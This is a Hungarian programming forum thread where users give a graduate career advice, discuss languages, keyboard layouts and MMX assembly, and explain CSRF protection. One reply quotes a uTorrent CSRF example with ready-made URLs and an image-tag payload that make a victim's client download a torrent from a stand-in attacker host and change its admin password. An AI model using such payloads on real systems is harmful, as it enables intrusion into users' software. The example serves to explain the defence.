Hirdetés
Köszönjük a sok biztatást, támogatást! Utolsó pillanat a féláras hirdetésfeladásra, előfizetésre!
-
Mobilarena
Új hozzászólás Aktív témák
-
bambano
titán
válasz
bandi0000 #13425 üzenetére
ha a cv-det is telerakod helyesírási hibával, akkor be se fognak hívni...
bár most még az az időszak van, hogy állítólag mindenkit felvesznek, akinek van pulzusa, de ennek vége. a tegnaptávtól is ki fognak szórni egy csomó embert, akiknek van gyakorlata, referenciája, velük fogsz versenyezni.
-
törölt tag
válasz
Hát ezt némileg elszúrtad, hogy nem kezdtél egyetem mellett dolgozni, és most frissdiplomásként ekkorákat hibázol interjún, ezért én is kibasználak mint macskát szarni, már elnézést
Mondjuk kezdésnek, ha C#-ból képzed magad, akkor C# interjúkra járj, ne Java-ra. Az, hogy aki egy nyelvet tud bármiben programozik csak egy jól hangzó mítosz, legfeljebb egyetemi beadandók szintjén igaz. Ha nagyon nem megy, akkor megfontolhatod, hogy elmész Msc-re, és mellette keresel diákmelót, és ha onnét tovább tudsz lépni, hagyhatod/jegelheted is az Msc-t.
Na meg az is mindig játszik, hogy lejjebb adsz a fizetési igényekből (amiket látsz neten frissdiplomás fizetésnek, ahhoz jellemzően a tiédnél komolyabb tapasztalat társul), és 1-2 évig elmész szarért-hugyért tanulni. -
válasz
Ha Java interúra mész, ne C#ból készülj fel.
El kell döntened milyen terület érdekel, és arra elindulni, az ahhoz passzoló nyelvekben elmélyedni.
Mobil: Kotlin, Java, Swift, React Native
Frontend: JavaScript, TypeScript, React, Angular
Backend: Node.js, JAVA, PHP
Adatbányászat: PythonMindezekhez legalább a REST APIk használatát és a HTTP protokoll alapvető működését tanuld meg. De egyre divatosabb a GraphQL, arra is érdemes ránézni.
Továbbá tudjad mi a különbség az egyes adattípusok között. Érdemes minimális SQL tudást is felszedni Postgres/MySQL szerveren.
Majd a megfelelő területen dolgozó cégekhez jelentkezni.
Juniorként tényleg csak az alapokat kérik, illetve, hogy tudj logikusan gondolkodni.
A többit majd felszeded útközben.Ahogy fent is írtam, ha Java interjúra mész, ne C#-ból képezd ki magad. Nem is értem a kérdést.
-
válasz
bandi0000 #13383 üzenetére
Az En tapasztalatom az, hogy ugy lesz amugy tehetseges emberekbol webfejleszto, hogy barmilyen munkat elvallal, csak legyen gyorsan penz, aztan mikor rajon, hogy szakmai megbecsulese sajnos nincs (fuggetlenul attol, hogy leteznek nagyon jo webfejlesztok), mert annyi a kontar, hogy amikor valtani szeretne, meglatjak a cv-ben es kapja az ivet, mindegy mi van, bizonyitasi lehetoseget is alig kap. Szemelyes velemenyem az, hogy a webfejlesztes egy rohadt nagy csapda, amibol kesobb kitorni nagyon nehezen, es csak nagy anyagi aldozatokkal lehet.
Valoban sokkal nehezebb java/c#/c/c++/akarmi nyelven elhelyezkedni az elejen, kozeptavon meg altalaban kulonbseg se sok van, de hosszutavon nagyon meg fogod banni, ha a konnyebb utat valasztod.
Persze, Te eleted, Te dontesed, nameg az is lehet, hogy nincs igazam. -
válasz
bandi0000 #13381 üzenetére
Szerintem a legjobb amit tehetsz ilyen teren (ha opcio) az az, hogy:
Inkabb nem leszel webfejleszto.Van annyi mas, amit csinalni lehet, ami nem sokkal nehezebb, de negyed annyi szivassal jar, ketszeres fizetessel es osszehasonlithatatlanul nagyobb szakmai presztizzsel. Persze, ha az erdekel, go for it, csak mondom, lehet nem hulyeseg meg egyszer vegiggondolni a dolgot.
-
nihill
őstag
-
coco2
őstag
válasz
bandi0000 #13210 üzenetére
Ha szakdolihoz írod, bizony legyél csak tisztában vele, hogy más dolog magunknak otthonra játékot gyártani, meg megint más az, ha valamit üzleti tevékenységhez céges minőségben használunk. A weboldalak tartalma üzleti célra engedély nélkül nem használható fel. Még akkor sem, ha egy laikusok szerint nyilvánvalóan közületi célra szánt publikus információ, mint amilyen egy webáruház oldalán az árlista. Üzleti célra még az sem koppantható engedély nélkül. A valóban nyilvánosnak szánt anyag egyedül a közszereplést felvállalt színészek / média celebek nyilvános fényképei és nyilakozatai. Minden más tartalom külön licence nyilatkozatot igényel.
-
Silεncε
őstag
válasz
bandi0000 #13208 üzenetére
Akár megoldás lehet, hogy a HTML-parse-ra csinálsz egy saját szervert, ami X időnként lekéri, és az appod ettől a szervertől kéri el a már felparsolt adatot (mondjuk JSON-ra átalakítva). Kérdés, hogy mennyire fognak ennek örülni meg hogy mennyire ütközik ez a szabályzatukkal
-
Domonkos
addikt
válasz
bandi0000 #13138 üzenetére
De ez a felfogas akkor nem is kulonbozik annyira attol, mint aze, aki ugy gondolja, hogy olyan bongeszot fog hasznalni, amit ismer vagy szeret.
Elvegre az neked is egy teljesen tudatos dontesed, amikor kivalasztod a "szuper modern app"-hoz szukseges framework-oket es egyebeket, majd valami olyan modon rakod ossze az egeszet, hogy az csak bizonyos bongeszokon fog mukodni.
Ez szamomra inkabb tunik lustasagnak / hanyagsagnak a fejlesztoi oldalrol - de az vegkepp bosszanto, hogy emiatt a felhasznalo van leszolva. -
bozsozso
őstag
válasz
bandi0000 #13135 üzenetére
Na először elindulok a mysql táblákkal utána meg kiötlök valamit, de ki tudja lehet ebbe is beletörik a bicskám Ha más nem lesz akkor marad az excel tábla de nem adom fel.
Első ránézésre a php, java meg amit felsoroltatok nekem problémásnak tűnik, de biztosan azért mert számomra teljesen ismeretlen. Etőől függetlenül mindegyiket meg fogom nézni. Tábla felépítésben lenne valami tanácsotok?
-
bozsozso
őstag
válasz
bandi0000 #13129 üzenetére
Bár szerintem ez így bonyolult, ha jól veszem ki a szavaidból nem fejlesztő vagy, csak össze akarsz dobni valamit valamilyen nyelven ami segít valamiben
Hát igen ez a legjobb megfogalmazás. Kisebb programokat már készítettem excelben makróként is, de műkedvelő vagyok nem fejlesztő.
-
Silεncε
őstag
válasz
bandi0000 #13120 üzenetére
A nagyon mobilos "app-bumm"-nak ahogy én látom vége. Persze, van szükség fejlesztőre továbbra is, de az aranykornak leáldozott. Most a web megy, a cloud-os cuccok, stb.. Illetve ami mobilos appok készülnek, azok is egyre inkább valami multiplatform eszközzel (Ionic, React Native, Flutter, Xamarin), a sima, natív mobilfejlesztés visszaszorulóban van.
-
-
törölt tag
válasz
bandi0000 #13007 üzenetére
Az még fontos, hogy az első céges tapasztalat ne vegye el rögtön a kedved majd. Illetve az első pár év se.
~3 év után kezd igazán kinyílni ez az egész programozós világ átlagosan.
Ennyi időt el kell tölteni napi 8 órás munkaként a programozással, hogy...hmm, hogy fogalmazzak. A programozás tanulós időszaka a tutorial. Az első 2-3 év pedig a grindelős karakterfejlesztés. Utána pedig jön a megérdemelt end-game content, ahol az elején még zöldfülű vagy ugyan, de egy-egy boss legyőzése után radikálisan fog fejlődni a geared.
Kisebb cégnél ez hamarabb is megtörténhet, de az nem feltétlenül öröm, ha az ember nincs kész rá.Tehát kitartást és sok sikert. A pénz is jönni fog majd. Ne félj majd munkahelyet váltani 1-1.5 év után. Nagyot fog ugrani a kezdő fizuhoz képest. Aztán 3 év után megint egy nagyot lépsz felfelé. Aztán majd szépen belassul ez is, aztán ha igazán jó vagy, akkor ... de ez messze van még
-
törölt tag
válasz
bandi0000 #13005 üzenetére
Saját tapasztalat és vélemény:
Ha csak a sulit csináltad, akkor veszteséget fogsz termelni a cégnek, aki felvesz téged, mert nem lesz elég a tudásod. Simán lesz pár hónap, mire talán a saját béred ki fogod tudni termelni. Emellett lekötöd az ottani kollégák figyelmét is, ami miatt ők lassabban haladnak majd.
Ezáltal a kezdeti fizetésed simán lehet 150-200 közötti. Főleg vidéken. (Ha penge vagy angolból, akkor ez lehet 200-250 közötti PESTEN. Amennyiben nem vagy jó angolból, akkor pedig...hát igazából akkor nem sok értelme van programozást tanulni. Az angol tudás komoly projekteknél elengedhetetlen.)
2-3 év után lehet normális fizetést realizálni.
Tehát a félelmed valós, de ez ilyen. A 8 általánossal rendelkező futár nem termel veszteséget (vagy kirúgják gyorsan) a cégnek. Miután te is kikupálódtál, akkor jöhet a rendes fizetés.Az utolsó bekezdésed viszont aggasztó, na nem nekem, hanem magadnak. Átlagosan a cégnél a projekteken dolgozol. Magyarisztánban leginkább régi projekteket kell karbantartani. Amiktől fejlődik a tudásod, de nem leszel naprakész, ha te magadnak nem teszel egy szívességet. Vannak cégek, akik támogatják, hogy a munkaidő X részében képezd magad, de ezeket a helyeket meg kell találni.
Szóval ha nem tartod magad up-to-date, akkor erős hátrányban leszel a piacon.
Területtől függ, hogy ez mennyi energiabefektetéssel jár. Mindenhol kell, de vannak területek, amik lassabban fejlődnek és változnak. Például mobilos vonalon ~2 évente változik meg minden és muszáj lépést tartanod, különben a friss kódod is legacy lesz, amit más bottal se igazán szeretne piszkálni.Találtam egy nem régi hozzászólást, amiben a kotlinról kérdezősködsz. Egy friss/juinor droid fejlesztőnek nem szabadna (SZERINTEM) kérdésnek lennie, hogy megakarja-e tanulni a kotlint. Sőt...nem csak a kotlint, hanem már ott a flutter is...mert oké, hogy te leszel az istencsászár natív droid fejlesztő. Kezd a felé tolódni az elvárás, hogy crossplatform appok legyenek...
A piacnak igénye van jó fejlesztőkre, de igénye van 'gyári betanított munkásokra is'. Amennyiben nem képzed magad, akkor a betanított munkásokkal fogsz versenyezni. Vagy pedig beragadsz és 10-15 éves kódokat kell majd tákolnod, ami gyorsan megöli az ember lelkesedését.
Természetesen minél többet programoztál és minél több fajta dolgot láttál, annál kevesebb energiabefektetés kell abba, hogy az új dolgokat elsajátítsd. Tehát az elején sokat kell otthon is nézegetned (ha jó akarsz lenni), aztán egyre kevesebbet, de olyan nem lesz, hogy hátradőlhetsz és 'na én már jó programozó vagyok, mindent tudok a területemen'. -
-
bandi0000
nagyúr
válasz
bandi0000 #12997 üzenetére
Ha lenne itt egy varázsló azt megköszönném
Adott egy fájl, sajnos csak pdf-ből tudtam generálni, szóval olyan lett amilyen...
Ezzel mit lehetne csinálni, hogy importálni lehessen egyszerűen? 2 oszlopot külön külön szét tudom választani, szóval csak 1 oszloppal kellene foglalkozni, csak ilyen oszlopból van 40 oldal
és ha kézzel kell megcsinálnom tuti belerokkanok
-
IMIIKE1998
őstag
válasz
bandi0000 #12930 üzenetére
A mérnökinfó a másik ilyen. :D
Hát gondoltam, az OKJ akkor felesleges penzkidobás lenne.jarnyz: Értem, hát akkor valószínűleg nem ez az én pályám. Az idegen nyelvek logikája megy, de ez tényleg más. Akkor nem is erőltetem, mert nem sok értelme lenne ezek szerint a megfelelő matektudás nélkül.
Köszi mindkettőtöknek! :R
-
IMIIKE1998
őstag
válasz
bandi0000 #12928 üzenetére
Nem tudom, melyik szakon vagy, de a progtervező infóról ódákat zengenek, hogy milyen nehéz és csak úgy rugdossák kifelé az embereket.
Gondolom ez vicces, de anno Comedius Logo-ztunk infóórán, az viszonylag jól ment. Gondolom, ez valami brutál lebutított valami lehetett. :D
Arra gondoltam, hogy esetleg kipróbálom majd valamelyik OKJ-s képzésen(webfejlesztő pl.) Hát sajna nekem a matematikai logika nem megy, szabályok nélkül nem tudom kitalálni, hogyan oldjak meg egy feladatot. -
Ispy
nagyúr
válasz
bandi0000 #12780 üzenetére
Én spec az esetek 95%-ban a saját magunk által megírt keretrendszert használom, ami teljesen lebutítja a programozói feladatokat, hiszen nem az a célja, hogy az ember zseniális és hatalmas kódhalmazokat írjon, hanem az, hogy ha kell, akkor 3 óra alatt összerakjon egy formot adatbázis kapcsolattal, formázva stb., tehát hatékony eszköz legyen.
Ez azzal jár, hogy ha mondjuk 1 évig hozzá sem kell nyúlnom xml fájlokhoz, akkor igen, utána kell olvasnom, hogy hogy is kell xml fájlokat kezelni, gugli.
Sokszor eszembe jut a régi könyvtárak kartoték rendszere, nem azt tudom, hogy mi van a könyvekben, azt tudom melyik könyvet hogyan tudom a leghatékonyabban megtalálni, sokszor csak arra emlékszem, hogy az adott dolgot melyik cégnél melyik projekben használtam, ilyenkor bevallom újrahasznosítom a kódokat.
Aztán ha egy kódot 3x is újra előveszek, akkor inkább kanyarítok belőle egy újabb lebutított classt és mehet a polcra a többi mellé, és megint nem fogok rá emlékezni fél év múlva hogyan és mit is csinál belül pontosan.
#mybad
-
válasz
bandi0000 #12733 üzenetére
Mindegy, hogy session-id-t használsz magában, vagy CSRF-et is külön - ha a session id nem cookie-ban megy, hanem form fieldben. Viszont ha Cookie alapú session kezelésed van, akkor kell GET/POST paraméter alapú CSRF token is.
Általánosságban viszont CSRF-védelem csak azokhoz az erőforrásokhoz kell, amelyek változtatnak szerveroldali állapoton (pl logon/logoff, konfig/erőforrás változtatás, tranzakció, create/update/delete) Kizárólag view request-ekhez nem kell CSRF token.
-
válasz
bandi0000 #12731 üzenetére
A CSRF védelem lényege, hogy minden hívásnál random (vagy csak nagyon rövid ideig - egy oldal életciklusáig - él). A tokent nem cookie-ban vagy más lokális store-ban tároljuk, hanem a lap kódjában kerül eltárolásban (legtöbbször hidden form field-ben, mert lekérésnél vissza kell adni a szervernek). A védelem lényege az, hogy a felhasználó nevében nem lehet olyan kérést indítani, aminek a "forrása" nem a kérdéses weboldal.
Illetve a fenti megoldás a "secure" mód - de ez elcseszi a vissza-gomb működését ("CSRF Failure"-t hibát generál), legtöbbször - alacsonyabb biztonsági szinthez, session-élettartamú CSRF-tokent generálnak.
Ennek a védelemnek egyébként az a feltétele, hogy atámadó ne tudja megszerezni a session/csrf token-t (azaz ne legyen az alkalmazásban XSS sebezhetőség - vagy az alkalmazás csrf token segítségével ezonosítsa a felhasználót ne csak session cookie és/vagy kliens ip alapján).
Jó példa erre (wikiből) az alábbi uTorrent sebezhetőség:
Torrent letöltés hozzáadása:
http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent
uTorrent administrator password megváltoztatása
http://localhost:8080/gui/?action=setsetting&s=webui.password&v=eviladminCSRF támadó kód simán kivitelezhető pl egy IMG tag hozzáadásával, ami a sebezhető címre mutat (BBCode):
[img]http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent[/img]
vagy ide a PH-ra:[IMG:http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent][/IMG]
-
cattus
addikt
válasz
bandi0000 #12568 üzenetére
Én munkából (Angular) kifolyólag főleg TypeScript (+CSS, HTML, JS), meg szakkolis tevékenység folytán Ruby (on Rails), egy kicsi Go meg Python. Meg most ismerkedek az Elixir-rel (+Phoenix framework).
C++, C#, Java-t tanultam egyetemen de már nem használom (pedig elég nagy C# fan voltam, de már elmúlt
).
-
kovisoft
őstag
válasz
bandi0000 #12568 üzenetére
Szerintem nagyon gyakori az, hogy több programnyelvet is kell napi szinten használni a munka során. Pl. a kolléga is említette már az SQL-t, de az is gyakori, hogy a "fő" nyelv mellett valamilyen szkript nyelvet kell használni (már akinek nem pont egy szkript nyelv a "fő"). Én pl. C-ben programozok, de gyakran kell bash, perl, python szkripteket írnom, ill. időnként PL-SQL kódot is. Ezenkívül van egy hobby projektem, ami egy vim szkript, ez értelemszerűen VimL-ben íródott. Ismerek még néhány másik nyelvet (C++, java, lisp, clojure), de ezeket nem használom napi szinten, úgyhogy ezeknél időnként utána kell néznem, hogyan is kell egy adott dolgot megcsinálni.
-
martonx
veterán
válasz
bandi0000 #12554 üzenetére
Én magyar kiosztású billentyűzetre esküszök. Programozóként dolgozok, de hiszem, hogy a programozói munka kisebb része a kód beverése, ráadásul tök jó kód kiegészítős, refaktorálós IDE-k léteznek. Nem kódoláskor meg igényes vagyok a magyarra, és szeretek ékezeteket használni. De ez csak egy vélemény.
-
DNReNTi
őstag
válasz
Nekem UK angol billentyuzet van a laptopban, ennek ket oka van:
- Az angol kioasztason sokkal hatekonyabban lehet kottat irni
- Az UK kiosztas fizikailag megegyezik a magyarral, igy ha ekezetesen akarok irni, csak atvaltom a nyelvet, es minden betu / irasjel ott van, ahol egy magyar billentyuzeten lenne. -
-
törölt tag
válasz
Ez nagyon egyéni vonzalom lesz.
Pl: Logikát, adat séma tervezést nem nagyon szoktak spamelni, mert semmivel sem jobb a spam+extra tesztelés, mint átgondolni + átnézni + kevesebbet tesztelni.
Nálam a spamelős rész a HTML+CSS volt, mielőtt elkezdtem prototípusokat gyártani általános feladatokra, illetve amég nem ismertem az Emmet-et. Most már számomra itt sem jelentős, hogy milyen a gépelési teljesítmény.
Kényelem szempontból az UK laptop bill elég jó volt, de vissza szoktam ISO->HU-ra, főleg mert egy időben csak ez volt a választék
.
( igen most páran biztosan fintorognak, de nekem nagyon ráállt a gépelésem a finom ollós kapcsolóra, amikor még nem a szigetes megoldás volt a menő)
-
cattus
addikt
válasz
Tekintve, hogy a gyakran használt karakterekhez(ilyenek pl a []{};"|:) kevesebb gomb lenyomása szükséges, meg kódolás közben úgyse kellenek az ékezetes magyar karakterek, így én kódolásra angolt használok (abból is a US, ISO billentyűzeten). Bár már nagyjából megtanultam vakon gépelni, így a feliratozás nem is nagyon számít, de kiosztásból kódolásra mindenképp az angol a preferált.
-
válasz
bandi0000 #12538 üzenetére
A html + css minden, csak nem egyszerű, a PHP az egyik legelbaltázotabb nyelv, amit ismerek és ez így együtt három nyelv, nem egy (oké, a HTML esetében lehet vitatni, hogy az egyáltalán nyelv-e, a CSS3 viszont Turing-teljes). Ha meg ehhez hozzávesszük, hogy webfejlesztést nem nagyon lehet megúszni javascript nélkül, akkor meg már négy nyelvnél tartunk és tök bonyolult koncepcióknál, meg ott, hogy minden böngészőben máshogy néz ki, meg a felbontások, meg a mobil, meg a...
szerk: látom, vótmá
Egyébként részermről is egy szavazat a Pythonra.
-
martonx
veterán
válasz
bandi0000 #12389 üzenetére
Ez nem a telhetetlenségről szól. Én Szegedről indultam, és az NNG a mai napig úgy reklámozza magát Szegeden, hogy ők itt is pesti béreket adnak, de ez rohadtul nem igaz.
Vidéki garázscégeknél arcpirítóak a fizetések, nagyobb multiknál (vidéki lerakataiknál) "csak" 30-50%-kal maradnak el a pestiektől.Ráadásul jellemzően vidékre a szar favágó munkákat küldik, ezért is írtam, hogy szakmailag se érdemes vidéken szerencsétlenkedni
Éppen tapasztalatot se tudsz olyan jól gyűjteni, mint pesten.
-
petyus_
senior tag
-
válasz
bandi0000 #12368 üzenetére
Ha a szakmai szempontból kérdezed: én 40 leszek, és már elkezdtem a lassú irányváltást. A programozás marad, de igyekszem ezt a saját pecsenyémben csinálni, munkában csak a nehéz kihívások maradnak. Később ez még látványosabb lesz, nyilván.
Egyéb szempontból: nem bízom én sem a nyugdíj-rendszerben, és eleve nem akarok majd 70 évesen melózni. Nem is lenne valószínűleg értelme. Igyekszem én is arra menni, hogy ha lehet, akkor 55-60 körül már kellő szabadságom legyen a munkában. -
-
válasz
bandi0000 #12320 üzenetére
"php szerver oldali, a typescript meg kliens"
Typescriptet oda raksz, ahova akarsz, szerverre is nyugodtan (ugye az egész nodejs dolog innen indult, hogy legyen serverside JS is), az expressjs pl. direkt ilyen webes appokhoz van.
Szerintem a PHP-t ha csak nem muszáj használni, akkor hagyd ki, borzasztóan rossz az egész úgy, ahogy van
-
martonx
veterán
válasz
bandi0000 #12320 üzenetére
mondjuk az adatokat belerendereled PHP-vel a DOM-ba, majd onnan typescripttel (jelzem ha ennyire nem vagy képben, először sima JavaScripttel kezdenék neki), kiszeded az adatokat.
Vagy csinálsz PHP-vel egy API Endpointot, ahonnan a Javascript (felejtsd el elsőre a typescriptet), ajax-al leszedi az adatokat. Javascript Fetch Api-ra guglizz rá.
-
cucka
addikt
válasz
bandi0000 #11622 üzenetére
Egy átlag multi (vagy olyan jellegű) cég azt, hogy
- tudj angolul folyékonyan beszélni
- tudj programozni, úgy általában véve. történt már olyan, hogy a senior fejlesztő tizenöt percet izzadt az interjún amíg megírt két for ciklust
- ismerd alapszinten a technológiát. csinálj egy hobbi projektet, ha nincs más. nyilván előtte találd ki, milyen technológia érdekel
- legyél már képben a szakirodammal. clean code, refactoring, olvass hacker newst, ilyesmi. mivel tudsz angolul, ez nem problémaamúgy egy csomó helyen olyat kérdeznek majd interjún, hogy járj be egy fát meg írj egy rekurziót. esetleg kapsz egy házi feladatot, hogy bizonyíts
-
ALFA
senior tag
válasz
bandi0000 #11620 üzenetére
Persze, ott van a BME-sek által felmagasztalt "programozó" gyerek esete, aki csak bodyzni járt és a vizsgáit a női írták helyette, diplomamunkáját webről lopta és azt kapta konzulensnek, akitől lopta, aki megdícsérte hogy talpraesett és segített neki még pár hivatkozást betenni, hogy nemzetközi kitekintésű legyen a dolgozata, és egy év után már egy spanyol-magyar cégnél volt vezető programozó, fogalma se volt a programozáshoz, csak kiosztotta a feladatot bizonyítva, hogy nagy arccal és még nagyobb szókinccsel lehet sokra vinni. Ha ragozni akarjátok, akkor lényegében erről szól a "Kipurcant a bébicsősz, anyának egy szót se" amerikai film, hogy nem a tudás, hanem a "megjelenés" alapján lesz valaki sikeres, de én itt részemről lezárom.
-
PumpkinSeed
addikt
válasz
bandi0000 #11620 üzenetére
Szerintem az egyetem nem azert kell, hogy megtanulj programozni. Az egyetem arra kell, hogy a matematikat megtanuld, es aztan ne csak weblapokat csinalj egesz eletedben. En is most kezdek raallni arra, hogy ujra matekot tanuljak, mert ha ertelmes dolgokat akarsz programozni 2017-ben akkor negyon fog kelleni. A programozas csak egy bonusz amit megtanulhatsz az egyetemen, de tobbnyire cegeknel fogod elsajatitani, mig a matekot ott nem nagyon.
-
ALFA
senior tag
válasz
bandi0000 #11613 üzenetére
Ha vette volna a fáradságot és visszaolvasott volna - vagy lenne minimális élettapasztalata - akkor tudná, hogy programozásnál értelmetlen a cv-vel nyomulva álláshoz jutni. Szőke titkárnőket meg lehet vele környékezni és kamu cégekhez be lehet kerülni, de érdemi cégek úgy kezdik, hogy még a nevedre se kiváncsiak, hanem először töltsd le a weboldalukról erre a célra szolgáló feladatokat, majd küldd be nekik azt az egy-két feladatot, amit valahogy képes voltál megoldani, és akkor eldöntik, hogy szóbaállnak-e veled.
Persze, tudom, tele van a web "most végeztem az egyetemet, itt van életem főműve, egy webes naptár, amibe beírhatod, mikor és hol és milyen találkozód lesz, de csak szerzői jog megfizetése mellett mutatom meg, mert a sok buta cég csak arra hajaz, hogy a magasan kiképzett egyetemistáktól ellopja a szellemi tőkét."
-
kovisoft
őstag
válasz
bandi0000 #11571 üzenetére
Ha 4 elemről van szó, akkor gondolom 16 bites word-öknek kell négyesével a maximumát venni, így a pmaxsw utasítást kell használni. Írnod kellene egy ciklust, ami 8 byte-onként (64 bitenként) végigmegy a tömbödön, és végrehajtja a pmaxsw utasítást a tömb legelején, ill. a tömb i-edit 8 byte-os szegmensén. Így a legvégén a tömböd legelejében benne lesz a 4 maximális érték.
Ha a folyamat során nem szabad elrontani a tömböt, akkor annyi plusz teendő van, hogy először át kell valahová másolni a tömb első 8 byte-ját, és aztán mindig ez a memóriaterület legyen a pmaxsw első operandusa (ugyanis ide íródik vissza a maximum érték), a második operandus továbbra is a tömb i-edik 8 byte-os szegmense.
-
válasz
bandi0000 #11504 üzenetére
"szerintem az nem gond neki"
Hát már hogy a francba ne lenne hiba?... Ilyenkor a "movq ered, mm0" felülírja az ered tömböt ÉS még négy byte-ot, ami mögötte van, márpedig attól függően, hogy a compiler mit gondol a dolgokról, ott bármi lehet, egy biztos: felülírni őket rettenetes hiba.
-
bandi0000
nagyúr
válasz
bandi0000 #11504 üzenetére
félig rá jöttem, mert ha int-ként definiálom, akkor nem dob hibát
de akkor még mindig nem értem, miképp függnek ezek össze
int 4 byte és ezek szerint 2 elemű tömböt tudok itt definiálni
amit össze adok egy 64 bites paddw-vel, és működik
de ugyan ez akkor is működik, ha short inttel definiálok 4 elemű tömböt és ugyan úgy a 64 bites paddw vel adom össze
-
kovisoft
őstag
válasz
bandi0000 #11480 üzenetére
A psub-nak mindegy, hogy előjeles vagy unsigned számokkal dolgozol, de a túlcsordulást ill. a negatív előjelet neked kell lekezelned (pl. csak viszonylag kis számokat vonsz ki, és akkor a legfelső bit mindig az előjel lesz).
A psubs csak előjeles számokat kezel, mert a túlcsordulást mindkét irányban a szélsőérték beállításával kezeli (szaturáció, telítés). Ezt leszámítva szerintem mindegy, hogy melyiket használod kellően kis számok kivonására. Viszont a végén kell még egy abszolút érték, ez a pabsb/pabsw/pabsd. Mármint ha jó értelmeztem a feladatot.
-
kovisoft
őstag
válasz
bandi0000 #11476 üzenetére
Túlcsordulás mindig lesz, csak az a kérdés, hogy milyen nagy számoknál következik be. Byte-os összeadásnál akkor, amikor az összeg eléri a 256-ot, word-nél 65536 elérésekor, stb. Mivel a padd tud 64 bittel műveletet végezni, ezért ha két 4 elemű tömböt akarsz összeadni, akkor definiálhatod őket short-ként, ahogy a korábbi példádban volt, de használd hozzá a word-ös paddw-t, ami 4 db 16 bites word-öt ad össze.
-
kovisoft
őstag
válasz
bandi0000 #11473 üzenetére
Nem mindegy, hogy char-ként vagy short-ként, stb. adod össze a számokat, mert mindegyiknek más a tartománya, ami fölött túlcsordul a művelet. Byte-osan összeadva pl. a 250+10=4 lesz, mert max. 255-öt tudsz tárolni egy byte-on, de short-ként elfér ugyanez az összeg. Az sem mindegy, hogy hány elemű tömböket tudsz így összeadni, mert byte-ból egyszerre 8-at, de short-ból csak 4-et.
Az mm0-ban ugyanúgy tömbként lesz tárolva az eredmény, mint amilyen a bemenő operandus volt, innen ugyanúgy egy movq-val tudod kiírni memóriába (mondjuk egy C tömbbe).
-
válasz
bandi0000 #11473 üzenetére
"mind1 hogy ha számokat akarok összeadni/kivonni/szorozni/osztani, akkor char-vagy int ként tárolom és adom össze?"
Egyáltalán nem és ez az egész MMX-es (illetve SIMD-s) bohóckodás lényege: hogy itt nem egy-egy számmal csinálsz valamit, hanem egyszerre sok számmal csinálod ugyanazt - jelen esetben egy utasítással összeadsz nyolc számpárt.
És itt jön elő az, hogy ezt a sok adatot hogyan adod át a processzornak - ha egyszer a paddb utasításnak csak két operandusa van, akkor hogy a csudába adsz meg neki 16 számot? Úgy, hogy azt mondod neki, hogy a (64 bites, vagyis 8 byte-os) operandus minden egyes byte-ját kezelje külön számként.
"ne haragudj, hogy ennyire értetlen vagyok, de alapvetően c/c++/c# vonalon mozgok"
Nem haragszok, de az teljesen biztos, hogy C vonalon egyáltalán nem mozogsz
A C gyakorlatilag egy hordozható assembler nyelv, ott létfontosságú, hogy tudd, hogy hogyan néznek ki az adataid a memóriában, márpedig nálad ez a rész láthatóan kimaradt, mert a C#-ban tök jól el lehet lenn úgy is, hogy ha ezt a részt egy "magic happens" felirat fedi el
A char nem azt jelenti, hogy az a típus karakter lenne (azt meg aztán végképp nem, hogy abban ASCII reprezentációban lenne bármi is), hanem csak azt, hogy az egy 8 bites érték (ráadásul a C standard sajnos azt sem specifikálja, hogy most signed vagy unsigned - a PADDB meg ilyen szempontból semleges, az általa adott eredmény akkor is jó lesz ha signed, meg akkor is, ha unsigned módon akarod értelmezni az eredményt - egészen addig, amíg nincs túlcsordulás).
-
válasz
bandi0000 #11471 üzenetére
A paddb pont azt csinálja, hogy az első tömb 0. elemét és a második tömb 0. elemét összeadja és az eredményt a második tömb 0. elemébe írja (ha túlcsordulás van, azt nem jelzi, a carry bitet nem jegyzi meg), meg ugyanezt párhuzamosan megcsinálja az összes többi elemre is (a te esetedben (1 byte-os értékek és 64 bites regiszterek) mind a nyolcra).
A tanár által adott kód annyit csinál, hogy az mm0 regiszterbe (ami egy 64 bites MMX regiszter) berakja az A tömböt (ami persze nem short int, hanem char és nem öt eleme van, hanem nyolc), az mm1 regiszterbe meg a B-t, aztán a kettőt összeadja és az eredményt ott látod az mm0* regiszterben.
*: Ez az idióta inteles szokás mindig összezavar, hogy náluk az első operandus a cél, a második meg a forrás.
-
válasz
bandi0000 #11447 üzenetére
Ha kell bármilyen interakció, akkor ne csinálj konzolosat. Az arra van, hogy ha CLI toolt akarsz csinálni, semmi másra. Ha a usernek a program futása közben meg kell nyomni valamit, be kell írnia valamit, ki kell valami menüt választania, akkor ne csinálj konzolost, mert csak magadat szivatod.
Új hozzászólás Aktív témák
● olvasd el a téma összefoglalót!
- Garmin Instinct – küldetés teljesítve
- Fejhallgató erősítő és DAC topik
- AMD K6-III, és minden ami RETRO - Oldschool tuning
- Samsung LCD és LED TV-k
- Renault, Dacia topik
- Milyen billentyűzetet vegyek?
- Milyen autót vegyek?
- Lakáshitel, lakásvásárlás
- Milyen egeret válasszak?
- Freemail
- További aktív témák...
- Gigabyte GA-F2A88XM-D3HP Alaplap + AMD A10-7800 Radeon R7 + 2x4GB ADATA DDR3 RAM
- iPhone14 Pro Max Független , dobozában , Alza Garancia
- Eladó 2tb szerver hdd több db
- OUTLET Áron - Steelseries, Razer, Logitech, Corsair - Számlával, Garanciával, Mélyen ár alatt!
- Samsung Galaxy S25 Ultra, 12/512, ezüstkék titán
- 13-14" Új és használt laptopok , üzletitől a gamerig , kedvező áron. Garanciával !
- DELL PowerEdge R740 rack szerver - 2xGold 6130 (16c/32t, 2.1/3.7GHz), 64GB RAM, 10Gbit HBA330, áfás
- Lenovo V130-15IGM laptop (Pentium Silver N5000/8GB/256GB SSD
- HIBÁTLAN iPhone 14 Pro Max 256GB Deep Purple -1 ÉV GARANCIA - Kártyafüggetlen, MS3011
- AKCIÓ! Gigabyte Z370M i5 9400F 16GB DDR4 512GB SSD RX 5700XT 8GB ZALMAN S2 TG Corsair S650W
Állásajánlatok
Cég: FOTC
Város: Budapest